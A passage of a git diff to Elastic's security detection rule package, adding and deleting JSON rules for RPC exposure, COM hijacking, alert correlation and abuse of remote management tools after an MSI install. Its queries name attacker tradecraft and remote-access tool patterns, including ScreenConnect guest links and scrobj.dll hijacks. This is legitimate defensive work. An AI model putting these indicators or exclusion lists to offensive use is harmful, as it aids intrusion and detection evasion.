false, - "name": "kubernetes.audit.user.username", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.verb", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "12a2f15d-597e-4334-88ff-38a02cb1330b", - "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Data Source: Kubernetes", - "Tactic: Discovery", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1613", - "name": "Container and Resource Discovery", - "reference": "https://attack.mitre.org/techniques/T1613/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 206 - }, - "id": "12a2f15d-597e-4334-88ff-38a02cb1330b_206", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_105.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_105.json deleted file mode 100644 index bfc42b12b15..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_105.json +++ /dev/null @@ -1,98 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector.", - "from": "now-9m", - "index": [ - "packetbeat-*", - "auditbeat-*", - "filebeat-*", - "logs-network_traffic.*", - "logs-panw.panos*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "RPC (Remote Procedure Call) from the Internet", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating RPC (Remote Procedure Call) from the Internet\n\nRPC enables remote management and resource sharing, crucial for system administration. However, when exposed to the Internet, it becomes a target for attackers seeking initial access or backdoor entry. The detection rule identifies suspicious RPC traffic by monitoring TCP port 135 and filtering out internal IP addresses, flagging potential threats from external sources.\n\n### Possible investigation steps\n\n- Review the source IP address of the alert to determine if it is from a known malicious actor or if it has been flagged in previous incidents.\n- Check the destination IP address to confirm it belongs to a critical internal system that should not be exposed to the Internet.\n- Analyze network traffic logs to identify any unusual patterns or volumes of traffic associated with the source IP, focusing on TCP port 135.\n- Investigate any related alerts or logs from the same source IP or destination IP to identify potential patterns or repeated attempts.\n- Assess the potential impact on the affected system by determining if any unauthorized access or changes have occurred.\n- Consult threat intelligence sources to gather additional context on the source IP or any related indicators of compromise.\n\n### False positive analysis\n\n- Internal testing or development environments may generate RPC traffic that appears to originate from external sources. To manage this, add the IP addresses of these environments to the exception list in the detection rule.\n- Legitimate remote management activities by trusted third-party vendors could trigger the rule. Verify the IP addresses of these vendors and include them in the exception list if they are known and authorized.\n- Misconfigured network devices or proxies might route internal RPC traffic through external IP addresses. Review network configurations to ensure proper routing and add any necessary exceptions for known devices.\n- Cloud-based services or applications that use RPC for legitimate purposes might be flagged. Identify these services and adjust the rule to exclude their IP ranges if they are verified as non-threatening.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the attacker.\n- Conduct a thorough examination of the system logs and network traffic to identify any unauthorized access or data exfiltration attempts.\n- Apply the latest security patches and updates to the affected system to address any vulnerabilities that may have been exploited.\n- Change all administrative and user credentials on the affected system and any other systems that may have been accessed using the same credentials.\n- Implement network segmentation to limit the exposure of critical systems and services, ensuring that RPC services are not accessible from the Internet.\n- Monitor the network for any signs of re-infection or further suspicious activity, focusing on traffic patterns similar to those identified in the initial alert.\n- Escalate the incident to the security operations center (SOC) or relevant cybersecurity team for further investigation and to determine if additional systems are compromised.", - "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and (destination.port:135 or event.dataset:zeek.dce_rpc) and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", - "references": [ - "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" - ], - "related_integrations": [ - { - "package": "network_traffic", - "version": "^1.1.0" - }, - { - "package": "panw", - "version": "^5.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "network.transport", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 73, - "rule_id": "143cb236-0956-4f42-a706-814bcaa0cf5a", - "severity": "high", - "tags": [ - "Tactic: Initial Access", - "Domain: Endpoint", - "Use Case: Threat Detection", - "Data Source: PAN-OS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1190", - "name": "Exploit Public-Facing Application", - "reference": "https://attack.mitre.org/techniques/T1190/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "143cb236-0956-4f42-a706-814bcaa0cf5a_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_119.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_119.json new file mode 100644 index 00000000000..256687cbb19 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_119.json @@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Component Object Model Hijacking", + "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\" and process.executable != null and \n (\n (\n registry.path : \"HK*\\\\InprocServer32\\\\\" and\n registry.data.strings: (\"scrobj.dll\", \"?:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\"\n ) or\n\n (\n registry.path : \"HKLM\\\\*\\\\InProcServer32\\\\*\" and\n registry.data.strings : (\"*\\\\Users\\\\*\", \"*\\\\ProgramData\\\\*\")\n ) or\n\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (\n registry.path : (\n \"HKEY_USERS\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\DelegateExecute\",\n \"HKEY_USERS\\\\*\\\\TreatAs\\\\\",\n \"HKEY_USERS\\\\*\\\\ScriptletURL*\", \n \"HKEY_USERS\\\\*\\\\TypeLib*\\\\Win*\"\n ) and\n not registry.data.strings : (\n /* COM related to Windows Spotlight feature */\n \"{4813071a-41ad-44a2-9835-886d2f63ca30}\",\n\n /* AppX/MSIX DelegateExecute handlers: execute, protocol, file */\n \"{A56A841F-E974-45C1-8001-7E3F8A085917}\",\n \"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}\",\n \"{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}\"\n )\n )\n ) and \n \n not (\n process.code_signature.trusted == true and\n process.code_signature.subject_name in (\n \"Island Technology Inc.\", \"Google LLC\", \"Grammarly, Inc.\", \"Dropbox, Inc\", \"REFINITIV US LLC\", \"HP Inc.\", \"Adobe Inc.\",\n \"Citrix Systems, Inc.\", \"Veeam Software Group GmbH\", \"Zhuhai Kingsoft Office Software Co., Ltd.\", \"Oracle America, Inc.\",\n \"Brave Software, Inc.\", \"DeepL SE\", \"Opera Norway AS\", \"Thomas Braun\", \"Slack Technologies, LLC\", \"Spotify AB\",\n \"Vivaldi Technologies AS\"\n )\n ) and \n\n /* excludes Microsoft signed noisy processes */\n not\n (\n process.name : (\n \"OneDrive.exe\", \"OneDriveSetup.exe\", \"FileSyncConfig.exe\", \"Teams.exe\", \"MicrosoftEdgeUpdate.exe\", \"msrdcw.exe\",\n \"MicrosoftEdgeUpdateComRegisterShell64.exe\", \"setup.exe\", \"PowerToys.PowerLauncher.exe\"\n ) and\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\")\n ) and\n \n not process.executable : (\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\ProgramData\\\\4Team\\\\4Team-Updater\\\\4Team-Updater-Helper.exe\",\n \"?:\\\\ProgramData\\\\Lenovo\\\\Udc\\\\Hosts\\\\x64\\\\MessagingPlugin.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Wondershare\\\\Wondershare NativePush\\\\WsToastNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\FMToastNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\regsvr32.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\",\n \"\\\\Device\\\\Mup\\\\*\\\\Kufer\\\\KuferSQL\\\\BasysSQL.exe\"\n )\n", + "references": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 119 + }, + "id": "16a52c14-7883-47af-8745-9357803f0d4c_119", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/171a4981-9c1a-4a03-9028-21cff4b27b38_1.json b/packages/security_detection_engine/kibana/security_rule/171a4981-9c1a-4a03-9028-21cff4b27b38_1.json deleted file mode 100644 index 1bbb7246456..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/171a4981-9c1a-4a03-9028-21cff4b27b38_1.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects potential lateral movement or post-compromise activity by correlating alerts where the host.ip of one alert matches the source.ip of a subsequent alert. This behavior may indicate a compromised host being used to authenticate to another system or resource, including cloud services.", - "from": "now-30m", - "interval": "29m", - "language": "esql", - "license": "Elastic License v2", - "name": "Suspected Lateral Movement from Compromised Host", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspected Lateral Movement from Compromised Host\n\nThe detection rule uses alert data to determine when multiple alerts from different integrations involving the same user.name are triggered.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific host involved and the different modules and rules that triggered the alert.\n- Examine the timeline of the alerts to understand the sequence of events and determine if there is a pattern or progression in the tactics used.\n- Correlate the alert data with other logs and telemetry from the host, such as process creation, network connections, and file modifications, to gather additional context.\n- Investigate any known vulnerabilities or misconfigurations on the host that could have been exploited by the adversary.\n- Check for any indicators of compromise (IOCs) associated with the alerts, such as suspicious IP addresses, domains, or file hashes, and search for these across the network.\n- Assess the impact and scope of the potential compromise by determining if other hosts or systems have similar alerts or related activity.\n\n### False positive analysis\n\n- Vulnerability scanners.\n- Jump hosts, NAT gateways and proxies.\n\n### Response and remediation\n\n- Isolate the affected host from the network immediately to prevent further lateral movement by the adversary.\n- Conduct a thorough forensic analysis of the host to identify the specific vulnerabilities exploited and gather evidence of the attack phases involved.\n- Remove any identified malicious software or unauthorized access tools from the host, ensuring all persistence mechanisms are eradicated.\n- Apply security patches and updates to the host to address any exploited vulnerabilities and prevent similar attacks.\n- Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise.\n- Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns.\n- Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.", - "query": "from .alerts-security.*\n\n// any alerts excluding deprecated, low severity and threat_match rules\n| where kibana.alert.rule.name is not null and kibana.alert.risk_score > 21 and\n kibana.alert.rule.type != \"threat_match\" and\n not kibana.alert.rule.name like \"Deprecated - *\"\n\n// alerts with existing source.ip or host.ip\n| eval alert_source_ip = CASE(source.ip is not null, source.ip, null),\n alert_host_ip = CASE(host.ip is not null and source.ip is null, host.ip, null)\n\n| eval Esql.source_ip = COALESCE(alert_source_ip, alert_host_ip)\n| where Esql.source_ip is not null and Esql.source_ip != \"127.0.0.1\" and Esql.source_ip != \"::1\"\n\n| stats Esql.alerts_count = COUNT(*),\n Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),\n Esql.host_id_distinct_count = COUNT_DISTINCT(host.id),\n Esql.rule_name_distinct_count = COUNT_DISTINCT(kibana.alert.rule.name),\n Esql.event_module_values = VALUES(event.module),\n Esql.message_values = VALUES(message),\n Esql.rule_name = VALUES(kibana.alert.rule.name),\n Esql.event_action_values = VALUES(event.action),\n Esql.event_category_values = VALUES(event.category),\n Esql.process_executable_values = VALUES(process.executable),\n Esql.process_cmdline_values = VALUES(process.command_line),\n Esql.file_path_values = VALUES(file.path),\n Esql.host_id_values = VALUES(host.id),\n Esql.host_ip_values = VALUES(host.ip),\n Esql.destination_ip_values = VALUES(destination.ip),\n Esql.user_name_values = VALUES(user.name),\n SRC_IP = VALUES(source.ip)\n by Esql.source_ip\n\n// filter for different alerts from multiple hosts and where the host.ip of one alert matches the source.ip of the other alert\n| eval concat_ip_values = MV_CONCAT(TO_STRING(Esql.host_ip_values), \",\")\n| eval host_ip_equal_to_source_ip =LOCATE(concat_ip_values, TO_STRING(Esql.source_ip))\n| where Esql.rule_name_distinct_count >= 2 and Esql.host_id_distinct_count >= 2 and host_ip_equal_to_source_ip > 0 and SRC_IP is not null and Esql.alerts_count <= 100\n| KEEP Esql.*\n", - "required_fields": [ - { - "ecs": false, - "name": "Esql.alerts_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.destination_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.event_action_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_category_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_module_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.event_module_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.file_path_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.host_id_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.host_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.host_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.message_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_cmdline_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_executable_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.rule_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.rule_name_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.source_ip", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.user_name_values", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "171a4981-9c1a-4a03-9028-21cff4b27b38", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide" - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "171a4981-9c1a-4a03-9028-21cff4b27b38_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a3d5b36-b995-4ace-9b85-8a0af429ccf6_1.json b/packages/security_detection_engine/kibana/security_rule/1a3d5b36-b995-4ace-9b85-8a0af429ccf6_1.json deleted file mode 100644 index 6d769918c58..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1a3d5b36-b995-4ace-9b85-8a0af429ccf6_1.json +++ /dev/null @@ -1,118 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects Elastic SIEM high severity detection alerts that are observed for the first time in the previous 5 days of alert history. It highlights low-volume, newly observed alerts tied to a specific detection rule, analysts can use this to prioritize triage and response.", - "from": "now-7205m", - "interval": "5m", - "language": "esql", - "license": "Elastic License v2", - "name": "Newly Observed High Severity Detection Alert", - "note": "## Triage and analysis\n\n### Investigating Newly Observed High Severity Detection Alert\n\nThis rule surfaces newly observed, low-frequency behavior high severity alerts affecting a single agent within the current day.\n\nBecause the alert has not been seen previously for this rule and host, it should be prioritized for validation to determine\nwhether it represents a true compromise or rare benign activity.\n\n### Investigation Steps\n\n- Identify the affected host, user and review the associated rule name to understand the behavior that triggered the alert.\n- Validate the user context under which the activity occurred and assess whether it aligns with normal behavior for that account.\n- Refer to the specific rule investiguation guide for further actions.\n\n### False Positive Considerations\n\n- Newly deployed or updated software may introduce behavior not previously observed on the host.\n- Administrative scripts or automation tools can trigger behavior-based detections when first introduced.\n- Security tooling, IT management agents, or EDR integrations may generate new behavior alerts during updates or configuration changes.\n- Development or testing environments may produce one-off behaviors that resemble malicious techniques.\n\n### Response and Remediation\n\n- If the activity is confirmed malicious, isolate the affected host to prevent further execution or lateral movement.\n- Terminate malicious processes and remove any dropped files or persistence mechanisms.\n- Collect forensic artifacts to understand initial access and execution flow.\n- Patch or remediate any vulnerabilities or misconfigurations that enabled the behavior.\n- If benign, document the finding and consider tuning or exception handling to reduce future noise.\n- Continue monitoring the host and environment for recurrence of the behavior or related alerts.", - "query": "FROM .alerts-security.*\n| where kibana.alert.rule.name is not null and kibana.alert.risk_score >= 73 and\n not kibana.alert.rule.type in (\"threat_match\", \"machine_learning\", \"new_terms\") and\n not kibana.alert.rule.name like \"Deprecated - *\" and kibana.alert.rule.name != \"My First Rule\" and\n // covered by 7306ce7d-5c90-4f42-aa6c-12b0dc2fe3b8\n event.dataset != \"endpoint.alerts\"\n| STATS Esql.alerts_count = count(*),\n Esql.first_time_seen = MIN(@timestamp),\n Esql.last_time_seen = MAX(@timestamp),\n Esql.process_executable = VALUES(process.executable),\n Esql.cmd_line = VALUES(process.command_line),\n Esql.parent_executable = VALUES(process.parent.executable),\n Esql.file_path_values = VALUES(file.path),\n Esql.file_path_values = VALUES(file.path),\n Esql.dll_path_values = VALUES(dll.path),\n Esql.user_id_values = VALUES(user.id),\n Esql.user_name_values = VALUES(user.name),\n Esql.agent_id_values = VALUES(agent.id),\n Esql.host_id_values = VALUES(host.id),\n Esql.event_module_values = VALUES(event.module),\n Esql.source_ip_values = VALUES(source.ip),\n Esql.agents_distinct_count = COUNT_DISTINCT(agent.id) by kibana.alert.rule.name\n// fist time seen in the last 5 days - defined in the rule schedule Additional look-back time\n| eval Esql.recent = DATE_DIFF(\"minute\", Esql.first_time_seen, now())\n// first time seen is within 10m of the rule execution time\n| where Esql.recent <= 10 and Esql.agents_distinct_count == 1 and Esql.alerts_count <= 10 and (Esql.last_time_seen == Esql.first_time_seen)\n| keep kibana.alert.rule.name, Esql.*\n", - "references": [ - "https://www.elastic.co/docs/solutions/security/detect-and-alert/about-detection-rules" - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.agent_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.agents_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.alerts_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.cmd_line", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.dll_path_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_module_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.file_path_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.first_time_seen", - "type": "date" - }, - { - "ecs": false, - "name": "Esql.host_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.last_time_seen", - "type": "date" - }, - { - "ecs": false, - "name": "Esql.parent_executable", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_executable", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.recent", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.source_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.user_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.user_name_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "kibana.alert.rule.name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "1a3d5b36-b995-4ace-9b85-8a0af429ccf6", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide" - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "1a3d5b36-b995-4ace-9b85-8a0af429ccf6_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d_1.json b/packages/security_detection_engine/kibana/security_rule/1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d_1.json new file mode 100644 index 00000000000..077ec167d3e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d_1.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect. This behavior may indicate abuse where an attacker triggers an MSI install then connects via a guest link with a known session key.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Management Access Launch After MSI Install", + "note": "## Triage and analysis\n\n### Investigating Remote Management Access Launch After MSI Install\n\nThis rule fires when the same host runs msiexec with an install argument (/i) and within one minute starts a pre-configured RMM software.\n\n### Possible investigation steps\n\n- Confirm the sequence on the host: first event should be msiexec.exe with process.args containing \"/i\"; second should be a remote management software.\n- Review the source of the MSI file using file events.\n- Check whether use of RMM software is approved for this host.\n- Check network events to validate which remote host the RMM software connects to.\n- Correlate with other alerts for the same host (initial access, persistence, C2).\n\n### False positive analysis\n\n- Legitimate IT/MSP deployment of RMM for support.\n\n### Response and remediation\n\n- If unauthorized RMM use or abuse is confirmed: isolate the host, terminate the ScreenConnect client, remove or block the installation, and investigate how the MSI was delivered and who operates the relay.\n", + "query": "sequence by host.id with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"msiexec.exe\" and process.args : (\"/i*\", \"-i*\")]\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (process.name : \"ScreenConnect.ClientService.exe\" and process.command_line : \"*?e=Access&y=Guest&h*&k=*\") or\n (process.name : \"Syncro.Installer.exe\" and process.args : \"--config-json\" and process.args : \"--key\") or \n process.name : (\"tvnserver.exe\", \"winvnc.exe\") \n )\n ]\n", + "references": [ + "https://attack.mitre.org/techniques/T1219/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 